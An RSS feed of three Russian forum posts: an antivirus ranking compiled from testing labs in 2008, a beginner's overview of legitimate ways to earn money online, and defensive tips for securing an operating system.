						&lt;p&gt;&amp;#160; &amp;#160;На многочисленных форумах часто обсуждаются темы связанные с антивирусами. На вопрос о лучшем или оптимальном антивирусе обычно следует конкретный ответ: «Самый лучший антивирус это …». Вместо многоточия может стоять любая антивирусная программа, как популярная, так и малоизвестная. Причем в следующем сообщении ответ может быть абсолютно противоположным.&amp;#160; «Погуляв» по форумам, можно сделать вывод, что там трудно найти объективную информацию об антивирусных средствах защиты.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160;Сегодня известно довольно много компаний, профессионально тестирующих и составляющих рейтинги антивирусов. Несмотря на их авторитет и профессионализм, результаты этих рейтингов не одинаковы. Это объясняется тем, что они применяют различные методики тестирования антивирусов, а также не одинаковые критерии оценки качества антивирусных пакетов. Рейтингам антивирусов, выполненным независимыми международными экспертами, вполне можно доверять, однако существуют определенные трудности при их сравнении.&lt;/p&gt;
						&lt;p&gt;Методика определения лучшего антивируса&lt;/p&gt;
						&lt;p&gt;Несмотря на трудности сравнения результатов&amp;#160; тестов антивирусов, составим итоговый рейтинг антивирусных средств защиты, на основании данных, полученных наиболее авторитетными экспертными компаниями и тестовыми лабораториями, который поможет сделать объективный выбор лучшего антивируса на текущий момент времени. &lt;/p&gt;
						&lt;p&gt;Ниже приводятся основные характеристики участников итогового рейтинга антивирусов:&lt;/p&gt;
						&lt;p&gt;TopTenReviews,Inc - популярная американская компания, имеющая международный авторитет по оценке качества и определению рейтингов программного обеспечения, в том числе и антивирусного. Результирующий рейтинг лучших антивирусов составляется на основе экспертных оценок наиболее важных характеристик антивирусных программ, а именно: &lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; * простота использования антивируса;&lt;br /&gt;&amp;#160; &amp;#160; * эффективность защиты от вирусов, червей и других вредоносных&amp;#160; &amp;#160;программ;&lt;br /&gt;&amp;#160; &amp;#160; * регулярность обновления антивирусной базы;&lt;br /&gt;&amp;#160; &amp;#160; * возможности и характеристики защитного комплекса;&lt;br /&gt;&amp;#160; &amp;#160; * простота установки антивирусной программы;&lt;br /&gt;&amp;#160; &amp;#160; * уровень технического обслуживания.&lt;/p&gt;
						&lt;p&gt;Кроме того, все антивирусные пакеты проверяются на наличие международных сертификатов:&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160;1. ICSA Certified&lt;br /&gt;&amp;#160; &amp;#160;2. VB100% Certified&lt;br /&gt;&amp;#160; &amp;#160;3. W.C.L Level 1 Certified&lt;br /&gt;&amp;#160; &amp;#160;4. W.C.L Level 2 Certified&lt;/p&gt;
						&lt;p&gt;AV-Comparatives – авторитетная австрийская лаборатория, основным видом деятельности которой являются&amp;#160; тесты антивирусов. Методика тестирования, как правило, включает в себя три части.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; Первая - является&amp;#160; исследованием эффективности антивирусных программ при выявлении вирусов из собственной коллекции AV-Comparatives.&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; Вторая часть тестирования антивирусов направлена на выявление количества ложных срабатываний.&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; В третьей части производится измерение скорости сканирования&amp;#160; файлов компьютера антивирусной программой.&lt;/p&gt;
						&lt;p&gt;Результаты&amp;#160; тестов антивирусов лаборатории AV-Comparatives, представляют огромный интерес для пользователей, поскольку они позволяют объективно оценить способность различных антивирусных программ, выявлять вирусы, шпионские и другие вредоносные программы, а также определять уровень ложных срабатываний и скорость сканирования файлов.&lt;br /&gt;&lt;br /&gt; &lt;/p&gt;
						&lt;p&gt; Лаборатория восстановления данных FS – российская компания, профессионально занимающаяся восстановлением потерянных данных. Сотрудники лаборатории разработали свою методику сравнения антивирусов на основе вероятностной оценки их качества, с которой можно познакомиться на сайте Лаборатории FS:&amp;#160; wwwantivirus.ru&lt;/p&gt;
						&lt;p&gt;Virus.gr - греческая компания, специализирующаяся на тестах антивирусных программ и составлении рейтингов антивирусов. По заявлению специалистов этой лаборатории, основным их преимуществом является наличие одной из самых&amp;#160; крупных коллекций вирусов, насчитывающих более 480 000 уникальных экземпляров (virus samples, crc32 different files).&amp;#160; Говоря статистическим языком,&amp;#160; использование такой выборки, позволяет получить результаты тестов антивирусов, соизмеримыми с теми, которые были бы&amp;#160; получены при использовании 99% всех существующих в мире вирусов.&lt;/p&gt;
						&lt;p&gt;Принимая во внимание, что результаты тестов компании представляют в разных форматах, то существуют определённые трудности при их сравнении.&lt;/p&gt;
						&lt;p&gt;Так, например, если Top Ten Reviews и Virus.gr выдают результаты в виде рейтингов, где лучший антивирус занимает первое место, следующий второе и т.д., то AV-Test лучшие антивирусные программы обозначает двумя плюсами (++), те, что чуть хуже, одним плюсиком (+), а занимающие нижнюю часть рейтинга - двумя минусами (--).&lt;/p&gt;
						&lt;p&gt;В FS лаборатории сравнение антивирусов осуществляется на основе вероятностной оценки их качества, причем, чем эта оценка ближе к единице, тем антивирусный пакет лучше.&lt;/p&gt;
						&lt;p&gt;Следовательно, чтобы объективно сравнивать антивирусы, рейтинги, составленные разными тестовыми и экспертными компаниями должны иметь одинаковую систему оценок.&lt;/p&gt;
						&lt;p&gt;Предлагаем, лучшему антивирусу в каждом рейтинге присвоить 10 баллов, второму - 9 баллов, третьему - 8 и т.д. Таким образом, выберем по 10 лучших антивирусных программ по результатам каждого теста. Причем, если антивирусы получили одинаковую оценку по результатам теста, то и в итоговом рейтинге им присваивается одинаковое количество балов.&lt;/p&gt;
						&lt;p&gt;Райтинг антивирусных программ&lt;/p&gt;
						&lt;p&gt;Итоговый рейтинг антивирусов определяется, как сумма балов по результатам каждого теста, на основе данных независимых компаний, профессионально занимающихся тестированием антивирусных программ, что позволяет минимизировать возможные ошибки и погрешности измерений.&lt;br /&gt;&lt;br /&gt; &lt;/p&gt;
						&lt;p&gt;Таким образом, используя мажоритарный принцип, на основе общепризнанных международных рейтингов антивирусных средств защиты, которым вполне можно доверять, выберем 5 лучших антивирусных программ.&lt;br /&gt;&lt;br /&gt; &lt;/p&gt;
						&lt;p&gt; Ноябрь 2008&lt;br /&gt;	&lt;/p&gt;
						&lt;p&gt;Название производителя антивируса&lt;br /&gt;	&lt;/p&gt;
						&lt;p&gt;Итоговый рейтинг&lt;/p&gt;
						&lt;p&gt;Kaspersky&lt;/p&gt;
						&lt;p&gt;F-Secure&lt;/p&gt;
						&lt;p&gt;AVK (GData)&lt;/p&gt;
						&lt;p&gt;AVIRA&lt;/p&gt;
						&lt;p&gt;ESET Nod32&lt;br /&gt;&lt;br /&gt; &lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160;Принимая во внимание определение лучшего антивируса, приведенное в начале этой статьи, целесообразно перейти к понятию оптимального антивируса, которое наилучшим образом определяет необходимые и достаточные условия выбора антивирусной программы для конкретного компьютера.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160;Оптимальный антивирус – это антивирусная программа, надежно защищающая компьютер от всех видов вирусных угроз, включая фишингfishing) и хакерские атаки, максимально соответствующая ресурсам компьютера и требованиям пользователя. Другими словами, если после установки антивируса пользователь не замечает его присутствия, а компьютер на протяжении длительного времени работает быстро (не тормозит) и надежно, то есть все основания полагать, что Вы нашли то, что нужно и установленный антивирусный пакет, является оптимальным.&lt;/p&gt;
						&lt;p&gt; Следующий этап заключается в том, чтобы сравнить&amp;#160; необходимые системные требования для оптимальной работы выбранных антивирусов с имеющимися в Вашем распоряжении компьютерными ресурсами. Потому что, если установить мощный современный антивирусный пакет на «слабенький» или старенький компьютер, то от него будет мало толку. Компьютер будет, образно говоря, сильно тормозить, раздражая его владельца, а антивирус не сможет оптимально выполнять свои функции из за низкочастотного процессора или недостатка оперативной памяти.&lt;/p&gt;
						&lt;p&gt; На последнем этапе определения оптимального антивируса можно положиться на свои симпатии или привычки, так как риск уже минимален, ведь мы обоснованно выбрали лучшие из лучших из огромного количества предлагаемых антивирусных программ.&lt;/p&gt;
						&lt;p&gt;В заключение хотелось бы сказать несколько слов в защиту российского&amp;#160; разработчика антивирусов Dr.Web.&amp;#160; Возможно, продукты под маркой Dr.Web не занимают ведущих позиций в западных рейтингах антивирусов только потому, что в активах этой компании нет иностранного капитала. Зато вероятность обнаружения вирусов или, другими словами надежность антивирусной программы,&amp;#160; рассчитанная по методике &amp;quot;Лаборатории восстановления данных FS&amp;quot; является самой высокой и по этому показателю антивирус Dr.Web является лучшим на апрель 2008.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (SMOKED)</author>
			<pubDate>Sun, 06 Feb 2011 21:08:12 +0300</pubDate>
			<guid>https://xakerzone.bbeasy.ru/viewtopic.php?pid=8#p8</guid>
		</item>
		<item>
			<title>основные способы обогатиться в интернете</title>
			<link>https://xakerzone.bbeasy.ru/viewtopic.php?pid=7#p7</link>
			<description>&lt;p&gt;Можно ли заработать с помощью интернета? Да, можно, и вариантов, как зарабатывать в интернете деньги, на самом деле очень много. Конечно, заработок в интернете - это не получение денег из воздуха, но при приложении определённых усилий он более чем реален. В этой статье я постараюсь дать максимально полный, но в то же время доступный для новичков, обзор возможных методов заработка в интернете.&lt;/p&gt;
						&lt;p&gt;Но вначале несколько слов о том, какие способы заработка и почему я не буду рассматривать здесь. Во-первых, я не буду рассматривать способы, связанные с организацией своего бизнеса - такие, как самостоятельная продажа через интернет разных товаров, платные услуги (например, консультации психолога), предоставление платного доступа к информации и т. д. Они хорошо подходят для бизнесмена или для специалиста в определённой области, но для обычного пользователя интернета являются малодоступными. Во-вторых, я не буду рассматривать способы, связанные с использованием всяких не очень законных методов (например, организация за деньги атак на чужие сайты, фишинг, рассылка спама и т. п.) или обманом других пользователей интернета. В третьих, не будем рассматривать рискованные способы &amp;quot;заработка&amp;quot;, вроде игры на Форексе или вложений в HYIP-фонды. Наконец, я не буду я писать здесь о таких способах заработка в сети, которые считаю слишком специфическими или сомнительными, например, продажа инфопродуктов (представляющая собой, по сути, МЛМ, где вашей задачей будет продать кому-то товар, не представляющий особой ценности), создание дорвеев (во-первых, дорвеи замусоривают интернет, а во-вторых, этот способ очень труден для новичков), киберсквоттинг (спекуляция доменами) и т. п.&lt;/p&gt;
						&lt;p&gt;Эта статья - обзорная, её цель прежде всего описать основные виды заработка в интернете для начинающих, слабо разбирающихся в этой теме. Более подробно о каждом из вариантов зарабатывания денег в сети (например, копирайтинге, продаже ссылок со своего сайта и т. п.) рассказывается в других статьях, ссылки на которые я буду приводить в тексте по ходу изложения.&lt;/p&gt;
						&lt;p&gt;На всякий случай для совсем новичков - прежде чем пытаться зарабатывать в интернете, вам нужно завести себе электронный кошелёк. Наиболее популярной платёжной системой в рунете является webmoney. Поэтому, если электронного кошелька у вас ещё нет, зайдите на сайт webmoney.ru и скачайте оттуда и установите на свой компьютер webmoney keeper. Теперь на этот кошелёк вы сможете получать заработанные в интернете деньги, а заработанное затем можете вывести из сети либо там же и потратить (например, на оплату мобильного, покупки в интернет-магазинах и т. п.)&lt;/p&gt;
						&lt;p&gt;Итак, как же можно заработать, имея компьютер, доступ в интернет и свободное время?&lt;/p&gt;
						&lt;p&gt;Вначале рассмотрим простые способы заработка в интернете, не требующие никакого опыта и специальных знаний.&lt;/p&gt;
						&lt;p&gt;1) Тупая механическая &amp;quot;работа&amp;quot; для школьников - клики по ссылкам, платный серфинг, чтение рекламных писем, ввод капч и т. п. Если поискать сайты, рассказывающие о способах заработка в интернете, то окажется, что очень большое их количество посвящено подобной ерунде. &amp;quot;Заработать&amp;quot; таким образом можно лишь копейки и то, только в том случае, если у вас безлимитный интернет.&lt;/p&gt;
						&lt;p&gt;2) Платные регистрации, участия в опросах, написание сообщений на форумах с оплатой за посты. Некоторые сервисы (особенно западные) платят вам совсем немножко за то, что вы у них регистрируетесь, владельцы некоторых форумов, чтобы эти форумы &amp;quot;раскрутить&amp;quot;, платят (также очень немножко) за то, что вы общаетесь на этих форумах, а некоторые корпорации, время от времени, решают провести какое-нибудь маркетинговое исследование и с этой целью организуют опросы, участникам которых выплачивается небольшая сумма за заполнение анкеты (пример сайта платных опросов - anketka.ru). Хотя эти способы немножко менее бессмысленные, чем те, которые перечислены в первом пункте, заработаете вы таким образом те же копейки.&lt;/p&gt;
						&lt;p&gt;3) Заработок на файлообменниках. Файлообменник - сервис, предоставляющий место для хранения файлов. Файлообменники бывают разные. Одни дают скачивать файлы всем и без ограничений (например, narod.ru), другие же специально вводят разные ограничения по скорости и удобству скачивания файлов для тех, кто хочет скачивать их бесплатно, предлагая убрать эти ограничения за деньги (примеры таких файлообменников - depositfiles.com, vip-file.com, uploadbox.com и др.). Зарабатывать можно именно на вторых, т. к. они, как правило, платят тем, кто заливает файлы на файлообменник, за скачивание этих файлов. Т. о., вы можете взять какие-нибудь полезные файлы, закачать их на файлообменник, а затем размещать ссылки на эти файлы на своём сайте, разных форумах, в сообществах и т. п. Когда кто-то будет скачивать ваши файлы, сервис будет вам начислять деньги. Однако много заработать на этом способе также не выйдет.&lt;/p&gt;
						&lt;p&gt;Практика показывает, что у многих пользователей лень и нежелание разобраться в самых простых вещах мешают им, когда они пробуют зарабатывать в интернете. В частности, большинство, пробуя заработать, наичнают вот с этих самых простых способов, которые были описаны выше, хотя, если бы они потратили чуть-чуть времени и мыслительных усилий на то, чтобы разобраться в способах заработка в сети, то результат был бы намного больше. Хотите по-настоящему зарабатывать в интернете? Забудьте про предыдущие пункты и читайте дальше.&lt;/p&gt;
						&lt;p&gt;4) Участие в партнёрских программах и заработок на рефералах. Этот способ - простой, но не на 100%. Партнёрских программ в сети огромная масса - в одних легко может заработать и новичок, но для работы с другими требуется опыт. Некоторые партнёрские программы требуют наличия своего сайта (т. е. попадают в третью часть данного обзора).&lt;/p&gt;
						&lt;p&gt;Что представляет собой заработок на партнёрских программах? В интернете существует множество сайтов, которые что-нибудь продают, предлагают какие-нибудь платные услуги и т. п., и все эти сайты очень заинтересованы в том, чтобы о них узнало и пришло к ним как можно больше народу. Именно с этой целью они предлагают всем участие в партнёрских программах, смысл которых заключается в рекламе услуг, предоставляемых этим сайтом, продаваемых им товаров и т. п. Вы помогаете разными способами привлечь посетителей на тот или иной сайт, посетители платят за услуги или товары, вы получаете какой-то процент от их платежей.&lt;/p&gt;
						&lt;p&gt;Принимать участие в партнёрских программах можно по-разному. Самый простой вариант - партнёрская ссылка. После регистрации в программе вам предлагают специальную партнёрскую ссылку, используя которую, вы можете привлекать посетителей на их сайт. Также, кроме простой ссылки, могут предлагать баннеры, кнопки и т. п. Где эти ссылки и баннеры можно разместить? Можно разместить их на своём сайте, если он у вас есть, а также - на различных форумах, в блогах, в социальных сетях и т. п., где собираются люди, которых рекламируемый вами сайт мог бы заинтересовать. Похожим образом можно привлекать и рефералов. Кто такой реферал? Этот тот, кто зарегистрировался в какой-то системе, например, системе для продвижения сайтов по вашей партнёрской ссылке и стал там тратить (или наоборот, зарабатывать) деньги. За этого привлечённого реферала система будет платить вам часть своей комиссии, таким образом, за всех ваших активных рефералов вы будете получать от системы деньги, ничего не делая. Очень выгодно привлекать рефералов для новых, только что открывшихся, но перспективных систем. Пока о системе не знает большинство, вы можете привлечь туда очень много пользователей, и таким образом, обеспечить себе в будущем очень неплохой заработок. Сами также не бойтесь регистрироваться где-то по чьим-то партнёрским ссылкам. От этого вы ничего не потеряете, зато всегда сможете обратиться за советом к тому, чьим рефералом являетесь, т. к. ему будет выгодно объяснить вам и подсказать всё, чтобы вы зарабатывали больше. Также нередко системы дают за регистрацию по реферальным ссылкам специальные бонусы или скидки, а в некоторых вообще можно зарегистрироваться только по реферальной ссылке (или имея т. н. &amp;quot;инвайт&amp;quot;).&lt;/p&gt;
						&lt;p&gt;Второй вариант участия в партнёрских программах - когда вам предоставляется возможность создать как бы отдельный сервис, копирующий полностью или частично функции главного сайта. Обычно в этом случае вы можете сделать свой собственный дизайн и, т. о., рекламировать этот сервис как свой собственный, а о том, что он на самом деле не является вашим, посетители могут и не знать. Пример - многочисленные сайты знакомств, вроде love.rambler.ru, jdu.ru и т. д., являются лишь партнёрами главного сайта проекта mamba.ru. Очень часто такой вариант вам предлагают различные интернет-магазины.&lt;/p&gt;
						&lt;p&gt;Можно заработать неплохие деньги на партнёрских программах и следующим образом. Не создавать свой сайт и не рекламировать без устали сайт партнёрской программы на форумах и т. п., а купить рекламу в какой-то рекламной сети для определённого товара или сайта. Например, есть партнёрская программа по продаже средств для похудения. Вы покупаете рекламу, в которой рекламируете средство для похудения, и кликнув на которую, пользователь перейдёт на сайт, продающий средство, по вашей партнёрской ссылке. Однако нужно обладать определённым опытом для ведения кампаний в рекламных сетях, чтобы заработать от продажи рекламируемых вами товаров больше, чем вы сами потратите на рекламу.&lt;/p&gt;
						&lt;p&gt;Чтобы узнать подробнее о партнёрских программах и конкретных примерах таких программ, читайте статью о партнёрских программах и заработке на них.&lt;/p&gt;
						&lt;p&gt;Следующую группу методов заработка в интернете объединим под названием удалённая работа.&lt;/p&gt;
						&lt;p&gt;Эти методы будут во многом уже иметь отношение к тематике данного сайта, т. е. заработку именно веб-разработчика, поскольку существенная доля тех, кто зарабатывает через интернет, работая удалённо, и есть как раз люди, занимающиеся веб-дизайном, вёрсткой, веб-программированием, раскруткой сайтов, написанием для этих сайтов статей и т. д. и т. п. Также, работая через интернет удалённо, можно зарабатывать на написании статей для газет и журналов, на переводах с/на иностранные языки, на оформлении печатной продукции (т. е. вы делаете рисунки, например, для открыток) и т. д. Всех этих людей, зарабатывающих себе на жизнь подобным способом, обычно называют фрилансерами. Удалённое сотрудничество между работодателями и фрилансерами, как правило, выгодно и тем и другим. Фрилансер получает возможность работать дома, в спокойной обстановке, по свободному расписанию, подбирать только подходящие для него проекты и т. п., заказчик же получает возможность платить существенно меньшую цену - создание сайта фрилансерами, например, обычно обходится в несколько раз дешевле, чем при заказе его в профессиональной дизайн-студии. С организацией оплаты за выполненную работу тоже нет никаких проблем - можно использовать электронные платёжные системы, вроде webmoney или яндекс-денег. Для многих опытных фрилансеров работа в сети уже давно уже стала основным источником дохода.&lt;/p&gt;
						&lt;p&gt;Где же можно найти (или, наоборот, разместить) заказы для удалённой работы? Во-первых, существуют специальные сайты по данной тематике. Наиболее известными сайтами для фрилансеров в Рунете являются русский проект free-lance.ru и украинский (но, естественно, русскоязычный) проект weblancer.net. Кроме того, подобные заказы можно найти на многих специализированных форумах, таких, как, например, forum.searchengines.ru, где для поиска/размещения заказов отведены специальные разделы. Хотя в самом принципе зарабатывать через интернет в качестве фрилансера нет ничего сложного, такой способ заработка имеет множество различных тонкостей и нюансов, подробнее о которых рассказано в отдельной статье о фрилансе .&lt;/p&gt;
						&lt;p&gt;Одним из самых простых вариантов подобного способа заработка в интернете является заработок на написании статей, постов для блогов и форумов и т. п. Ведь в этом случае вам не нужно быть специалистом по веб-дизайну, знать программирование и т. п., достаточно просто быть грамотным человеком. Это очень хороший способ для новичков, потому что позволяет быстро и без вложений заработать какой-то стартовый капитал. Чтобы узнать больше о том, как и где можно продавать статьи и писать разные тексты за деньги, читайте подробности о заработке на написании статей.&lt;/p&gt;
						&lt;p&gt;И наконец, последняя, напрямую относящаяся к тематике сайта &amp;quot;Всё о веб-дизайне&amp;quot;, группа способов заработка в интернете - способы заработка при помощи своего сайта. Возможностей для того, чтобы, имея свой сайт, получить с него прибыль, сейчас очень много, и, как результат, даже солидные сайты, казалось бы, совершенно далёкие от коммерции, поддаются соблазну и зарабатывают, обвешиваясь рекламой. Итак, каким образом можно получить со своего сайта прибыль и заработать? Самые популярные на сегодняшний день методы следующие:&lt;/p&gt;
						&lt;p&gt;1) Размещение на своём сайте рекламы. Реклама в интернете это способ привлечения на свой сайт посетителей, но рекламу можно, естественно, не только покупать, но и продавать, получая за это деньги рекламодателей. Прямой поиск рекламодателей для своего сайта оправдан только для очень крупных проектов, небольшим сайтам приходится обращаться в специальные рекламные системы. Какие виды рекламы существуют? Их довольно много, и, очевидно, вы уже сталкивались со многими из них. Это и баннеры, и контекстная реклама, и реклама в разных всплывающих окошках, загораживающих полэкрана, и тизеры - маленькие объявления с картинками, которые обычно попадаются на новостных сайтах, и т. п. Практически любой из видов рекламы вы можете разместить на своём сайте. Какие из видов рекламы обычно выбирают вебмастера?&lt;/p&gt;
						&lt;p&gt;Исторически первой получила развитие баннерная реклама, т. е. когда пользователю показываются блоки графических изображений - баннеры. Прибыль от размещения баннерной рекламы обычно зависит от числа показов, при этом оплата за 1 показ составляет просто микроскопическую величину. Если у вас посещаемый сайт, то на баннерах можно хорошо заработать, но для небольших сайтов, как правило, более привлекательной является контекстная реклама. Это такая же реклама, как та, которую видит сейчас практически при каждом запросе посетитель поисковых систем. Что значит &amp;quot;контекстная&amp;quot;? &amp;quot;Контекстная&amp;quot; - значит зависящая от контекста страницы, на которой размещена, т. е. если на данной странице разместить контекстную рекламу, то показываться будут ссылки с рекламой о заработке в интернете, а если на странице рассказывается о моделях автомобилей, то и показываться будут ссылки с рекламой автомобилей. Т. о., логика контекстной рекламы - показать посетителю рекламу о том, про что он читает в данный момент, а значит, эта реклама будет для него определённо более интересной, чем реклама совершенно случайная. Действительно, по ссылкам из контекстной рекламы посетители кликают обычно более охотно, и, таким образом, и для владельцев сайтов, получающих некий процент от платы рекламодателя за каждый подобный клик, её размещение является более выгодным. Наиболее популярными в Рунете системами контекстной рекламы являются Google adsense, Бегун (принадлежащий Рамблеру), а также Яндекс.Директ.&lt;/p&gt;
						&lt;p&gt;Подробнее об этих и других рекламных системах, которые помогут вам продавать рекламу со своего сайта, читайте в статье Как заработать на своём сайте.&lt;/p&gt;
						&lt;p&gt;2) Продажа ссылок со своего сайта. О платных ссылках и биржах платных ссылок, таких, как sape или mainlink, также уже шла речь в статье о способах раскрутки сайта. Чем отличается метод заработка на продаже ссылок от заработка с помощью контекстной рекламы, которая также представляет собой, по сути, блок текстовых ссылок? Во-первых, этот способ связан с определённым риском - ведь поисковые системы не любят нетематические ссылки, и, найдя их на страницах вашего сайта, скорее всего, понизят его позицию в поиске, а при большом количестве таких ссылок ваш сайт вообще может попасть в бан или под какой-нибудь фильтр.&lt;/p&gt;
						&lt;p&gt;Во-вторых, в отличие от контекстной рекламы, где ваша прибыль зависит от того, как часто по ссылкам кликают посетители, доход от платных ссылок фиксирован (обычно оплачивается размещение ссылок на фиксированный период, скажем, на месяц) и от посещаемости не зависит. Конечно, в принципе, вы сами можете назначать цену размещения ссылок на своём сайте, однако в общем случае эта цена будет зависеть от таких параметров, как ТИЦ и PR, при этом ТИЦ - это показатель, который относится ко всему сайту целиком, а PR может быть разным для каждой его страницы. Следовательно, для того, чтобы можно было получить достаточно существенный доход от продажи ссылок со своего сайта, придётся его предварительно раскручивать, повышая ТИЦ сайта и PR как можно большего числа страниц. В то же время заработок на продаже ссылок один из самых простых и популярных среди новичков. Подробнее о том, как и где продавать ссылки.&lt;/p&gt;
						&lt;p&gt;3) Продажа места под статьи на своём сайте. Более позднее веяние, появившееся в результате поиска оптимизаторами новых путей для раскрутки сайтов. Если вместо отдельных ссылок покупать на других сайтах место под статьи, то ссылки в них не будут &amp;quot;выбиваться&amp;quot; из общей тематики страницы, а, значит, такой способ раскрутки более приемлем как для продавца, так и для покупателя. Продажа мест под статьи несёт двойную выгоду - вы и зарабатываете, и наполняете свой сайт готовым контентом. Для продажи/покупки статей тоже существуют специальные биржи. Примеры подобных бирж - seozavr и liex, кроме того, можно продавать/покупать места под статьи на разных тематических форумах.&lt;/p&gt;
						&lt;p&gt;4) Создание сервиса, приносящего прибыль, создание и развитие сайта для последующей продажи. Хотя это немного разные варианты, объединим их в один общий пункт. Дело в том, что в обоих случаях, чтобы получить от этого какую-то выгоду, сайт должен быть достаточно уникален и интересен пользователям сети. Вообще, наиболее успешная модель получения дохода в сети выглядит примерно так. Придумывается некая оригинальная идея, под которую создаётся проект, оказывающийся вдруг нужным и востребованным посетителями. Количество посетителей быстро растёт, вокруг проекта создаётся сообщество, и вот - заинтересованные таким успехом, крупные интернет-корпорации уже начинают предлагать вам за него миллионы долларов. Например, в 2006 г. популярный в интернете сервис YouTube был куплен компанией Google за 1.65 млрд. долларов! А один из последних примеров из этой серии - сайт chatroulette.com, созданный московским школьником Андреем Терновским. Всего за полгода прибыль с него достигла 1500$ в день, стоимость же самого проекта оценивается уже в 50 млн. долларов!&lt;/p&gt;
						&lt;p&gt;Для популярных, а главное, нужных пользователям сети проектов, способов зарабатывания на них (даже если возможности, предоставляемые за плату, будут являться лишь дополнительными к основным возможностям сервиса) можно придумать огромное множество. Те же биржи ссылок, например, или биржи для фрилансеров, приносят весьма неплохой доход их владельцам, без каких-либо значительных затрат. Безусловно, чтобы создать проект или сервис, на который скопом кинутся посетители интернета, без предварительных вложений гигантских средств, ваша идея должна быть достаточно нетривиальной. Но даже если вы и не собираетесь делать какой-то суперпроект, то вполне можно заняться созданием и развитием обычных интересных сайтов по различным тематикам, на которые, если вам удастся сделать их посещаемыми и популярными, можно будет затем легко найти покупателей.&lt;/p&gt;
						&lt;p&gt;Какой из методов заработка в интернете лучший? Конечно, зарабатывать можно разными способами, и у кого-то будет получаться лучше что-то одно или что-то другое, но поскольку интернет состоит из сайтов, то получение дохода на своём сайте или сайтах (т. к. их можно сделать много) - лучший способ заработка в интернете. Поэтому если у вас ещё нет своего сайта, создайте его, раскрутите и начинайте зарабатывать на нём. Для начала вы можете даже создать сайт на бесплатном хостинге (или блог на бесплатном блогосервисе), что не потребует от вас никаких вложений, но хорошо зарабатывать на них будет сложнее, чем на сайте с доменом второго уровня.&lt;/p&gt;
						&lt;p&gt;В этой статье были упомянуты лишь некоторые варианты получения прибыли от своего сайта, больше информации и подробностей вы найдёте в статьях Как заработать на своём сайте и 28 способов заработка на своём сайте.&lt;/p&gt;
						&lt;p&gt;У вас ещё остались вопросы про заработок в интернете? Задайте их на форуме!&lt;/p&gt;</description>
			<author>mybb@mybb.ru (SMOKED)</author>
			<pubDate>Sun, 06 Feb 2011 17:48:00 +0300</pubDate>
			<guid>https://xakerzone.bbeasy.ru/viewtopic.php?pid=7#p7</guid>
		</item>
		<item>
			<title>10 рекомендаций о защите вашей операционной системы</title>
			<link>https://xakerzone.bbeasy.ru/viewtopic.php?pid=6#p6</link>
			<description>&lt;p&gt;Существует ряд основных правил, универсальных для защиты любой операционной системы от несанкционированного доступа. Если помнить их и постоянно им следовать, можно значительно снизить риск взлома системы или появления других нежелательных проблем.&lt;/p&gt;
						&lt;p&gt;1...Использование сложных паролей. Одним из самых простых способов защиты является использование непростых трудноподбираемых паролей. Такой метод хорошо защищает от так называемых «грубых» атак, суть которых заключается в применении злоумышленниками программ по автоподбору паролей. Пароли, состоящие из специальных символов, прочерков и пробелов, содержащих прописные буквы наряду со строчными буквами и цифрами, гораздо труднее угадать, чем имя матери или дату рождения пользователя. Также следует помнить, что при увеличении длины пароля всего на один символ, увеличивается и степень числа возможных комбинаций для подбора. В целом, пароль длинной менее 8 символом объективно считается легким для подбора. 10, 12 или 16 символов – уже гораздо лучше. Однако не стоит придумывать такие пароли, которые трудно будет запомнить или набрать. &lt;/p&gt;
						&lt;p&gt;2...Внешняя защита. Не следует целиком полагаться только на возможности системы. Даже в случае наличия всего лишь одного компьютера неплохо иметь и внешний брандмауэр/маршрутизатор. В крайнем случае, можно приобрести обычный широко распространенный роутер, например Linksys, D-Link или Netgear (есть в продаже в магазинах Best Buy, Circuit City и CompUSA). Если этого покажется мало, то стоит установить коммутаторы и маршрутизаторы «промышленного» типа от таких производителей, как Cisco, Vyatta и Foundry Networks. Как вариант, можно использовать брандмауэры, спроектированные собственноручно с нуля или предустановленные, например m0n0wall и IPCop. Помимо этого, надежной внешней защите способствуют прокси-сервера, антивирусные и антиспамовые шлюзы. Также нужно учесть, что коммутаторы в плане защиты лучше хабов, маршрутизаторы с трансляцией сетевых адресов (NAT) лучше коммутаторов, а брандмауэры и вовсе суть средство первой необходимости. &lt;/p&gt;
						&lt;p&gt;3...Обновление программного обеспечения. Для того чтобы проверка приложений на вирусы перед их установкой проходила наиболее эффективно, следует постоянно обновлять программы защиты. Долгое игнорирование появляющихся обновлений может привести к тому, что система станет легкой добычей для хакеров. Это же касается любых систем обнаружения злоупотреблений, сканирующих трафик с целью поиска вредоносного участка кода - сигнатуры, например, антивирусных программ, которые не теряют свою эффективность, только в случае своевременного пополнения базы данных кодов, соответствующих той или иной атаке. &lt;/p&gt;
						&lt;p&gt;4...Отключение неиспользуемых служб. Зачастую пользователи не знают, какие системные сетевые службы работают у них на компьютере. К примеру, Telnet и FTP часто весьма уязвимы для сетевых атак и должны быть отключены в случае, если они не используются. Следует узнать, для чего нужна та или иная служба и удостовериться, что каждая работающая действительно имеет причины для того, чтобы работать. Возможно, потребуется тщательное исследование некоторых служб на предмет соответствия тем или иным интересам пользователя, например, не будет большой ошибкой отключение службы RPC на компьютере с операционной системой Microsoft Windows, или отмена входа в систему с паролем. В любом случае, отключение неиспользуемых служб – полезная вещь. Подробнее читайте в статье: Десять служб MS Windows XP, которые стоит отключить.&lt;/p&gt;
						&lt;p&gt;5...Шифрование информации. Этот метод подходит для опытных продвинутых пользователей или системных администраторов. Степень шифрования данных в каждом случае определяется индивидуально в зависимости от конкретных целей и обстоятельств. Зашифровываются как отдельные файлы, так и целые диски. Системный раздел жесткого диска при этом обычно не затрагивается, поскольку тогда потребуется специальное аппаратное устройство декодировки, однако если требуется безопасность подобного уровня, и имеются соответствующие средства, то можно произвести и такое полносистемное шифрование. Если же в кодировании системного раздела нужды нет, имеется множество решений для каждого уровня шифрования, работающих как с коммерческими системами, так и с платформами на основе открытого исходного кода. &lt;/p&gt;
